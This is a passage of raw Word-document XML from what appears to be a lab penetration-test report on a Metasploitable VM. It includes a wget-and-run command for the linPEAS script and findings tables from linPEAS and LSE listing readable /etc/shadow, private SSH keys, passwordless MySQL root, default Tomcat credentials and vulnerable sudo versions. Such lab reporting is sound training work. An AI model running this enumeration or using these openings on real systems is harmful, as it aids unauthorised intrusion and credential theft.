                              <w:t>./linpeas.sh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75002pt;margin-top:15.457031pt;width:471.45pt;height:27.75pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15725056;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" id="docshape49" filled="true" fillcolor="#1e1e1e" stroked="false">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p>
                      <w:pPr>
                        <w:spacing w:line="225" w:lineRule="exact" w:before="0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FF00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>wget</w:t>
                      </w:r>
                      <w:hyperlink r:id="rId18">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Courier New"/>
                            <w:color w:val="00FF00"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>https://github.com/carlospolop/PEASSng/releases/latest/download/linpeas.sh</w:t>
                        </w:r>
                      </w:hyperlink>
                    </w:p>
                    <w:p>
                      <w:pPr>
                        <w:spacing w:before="78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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>chmod</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>+x</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>linpeas.sh</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>&amp;&amp;</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:color w:val="00FF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FF00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>./linpeas.sh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40" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="14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57700" cy="381000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4"/>
        <w:rPr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6"/>
        <w:gridCol w:w="1080"/>
        <w:gridCol w:w="5937"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="2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Finding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 w:before="2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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5937" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="2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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="345" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336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Already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Root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Highest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5937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You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are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already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running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as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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="615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Writable</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="21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/etc/passwd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593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/etc/passwd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writable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="350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MySQL root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no</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="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password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593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MySQL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root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account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allows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login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no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password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="590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NFS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Export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5937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/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*(rw,sync,no_root_squash,no_subtree_check)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entire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filesystem exported with no_root_squash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="614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SUID/SGID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Binaries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:right="177"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium–</w:t>
            </w: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5937" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="510"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>screen,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at,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X,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chage,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crontab,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unix_chkpwd,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Eterm,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bsd-write,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ssh-agent, mlocate, expiry, xterm, wall, uuidd, postqueue, postdrop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="350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Apache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Process</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> Running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593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Can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dump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credentials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from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memory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as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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="610" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:ind w:right="927"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Root SSH </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Authorized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Keys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593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Root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accepts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msfadmin@metasploitable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SSH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key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="595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Private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SSH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Keys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Found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593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Found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/home/user/.ssh/id_dsa,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/home/msfadmin/.ssh/id_rsa,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1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/etc/ssh/ssh_host_rsa_key,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="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/etc/ssh/ssh_host_dsa_key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="525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Readable</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="exact" w:before="21"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Shadow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File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593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/etc/shadow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readable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(contains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password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hashes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="530" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336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MySQL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="21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Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080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5937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/etc/mysql/debian.cnf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="1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readable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="1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(contains</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="1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debian-sys-maint</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="1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creds)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="524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Tomcat</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1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Credentials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593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Default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credentials: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tomcat:tomcat,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role1:tomcat,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both:tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:bottom="1339" w:left="720" w:right="360"/>
        </w:sect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6"/>
        <w:gridCol w:w="1080"/>
        <w:gridCol w:w="5937"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="350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PostgreSQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="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Access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593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pg_hba.conf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allows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md5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auth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from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any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IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="350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VNC </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Password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593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/root/.vnc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="2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exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="610" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336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Firefox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Saved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Passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="254" w:lineRule="auto"/>
              <w:ind w:right="280"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low–</w:t>
            </w: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5937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signons.sqlite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contains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encrypted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credentials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(Twitter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="615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.rhosts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Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:right="280"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low–</w:t>
            </w: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593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/home/msfadmin/.rhosts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/root/.rhosts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> exist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="610" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="254" w:lineRule="auto"/>
              <w:ind w:right="1145"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Samba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Share </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Writable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="254" w:lineRule="auto"/>
              <w:ind w:right="280"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low–</w:t>
            </w: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593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Guest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access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enabled;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writable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shares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smb.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="790" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:right="125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Vsftpd Anonymous</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="238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Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:right="280"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low–</w:t>
            </w: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593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Anonymous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login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+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upload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+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mkdir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enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="350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Distcc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Running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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="593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Port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3632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open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(distccd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service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="530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Port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1524</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="21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(ingreslock)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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="593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Possible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backdoor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shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="345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IRC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Running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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="593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UnrealIRCd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on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ports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6667,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6697</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="185"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>LSE (Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Smart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4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103300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5186776" cy="4400550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776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1"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/>
        </w:sect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7"/>
        <w:gridCol w:w="2617"/>
        <w:gridCol w:w="3983"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="565" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2757" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="2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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="2"/>
              <w:ind w:left="109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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3983" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="2"/>
              <w:ind w:left="10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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495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Writable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/etc/passwd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/etc/passwd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writable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="980" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2757" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="462"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NFS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Export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With </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>no_root_squash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/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1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*(rw,sync,no_root_squash,no_subtree_check)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto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—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entire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filesystem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exported</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="740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MySQL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Root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No </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Password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3983" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="108" w:right="243"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Can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connect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MySQL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as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root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no </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="490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Readable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/etc/shadow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Can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read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shadow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file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(password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hashes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="740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CVE-2021-3156</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="1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(Baron</w:t>
            </w:r>
          </w:p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Samedit)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sudo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version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1.6.9p10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2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="735" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2757" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="462"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2023-22809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(Sudoedit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bypass)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sudo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version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1.6.9p10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2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="740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Writable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Setuid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Binaries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Writable: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/bin/umount,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/bin/mount,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1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/bin/ping,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/usr/bin/at,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/usr/bin/nmap,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etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="735" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2757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Writable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Directories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4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> PATH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="10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3983" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="108" w:right="243"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/bin,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/etc,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/sbin,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/usr/bin,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/usr/sbin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are </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>writable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="740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nmap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Setuid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Binary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3983" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto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/usr/bin/nmap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setuid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root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exploitable (interactive mode)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="755" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2757" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="254" w:lineRule="auto"/>
              <w:ind w:right="1140"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Uncommon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Setuid </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Binaries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="254" w:lineRule="auto"/>
              <w:ind w:left="109" w:right="1715"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium–</w:t>
            </w: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3983" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="239" w:lineRule="exact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nmap,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X,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netkit-rsh,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netkit-rlogin,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netkit-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>rcp,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1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/usr/lib/telnetlogin,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/usr/lib/apache2/suexec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495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Apache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Process</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> Running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Can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dump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credentials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from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memory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as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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="735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Root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SSH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Authorized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Keys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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="108" w:right="243"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Root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accepts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msfadmin@metasploitable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SSH </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1224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Private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SSH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Keys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Found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Keys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found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in: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/home/user/.ssh/id_dsa,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="242" w:lineRule="exact" w:before="1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/home/msfadmin/.ssh/id_rsa,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="242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/etc/ssh/ssh_host_rsa_key,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto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/etc/ssh/ssh_host_dsa_key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="740" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2757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MySQL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Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="108" w:right="279"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/etc/mysql/debian.cnf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readable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(debian-sys-maint user)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
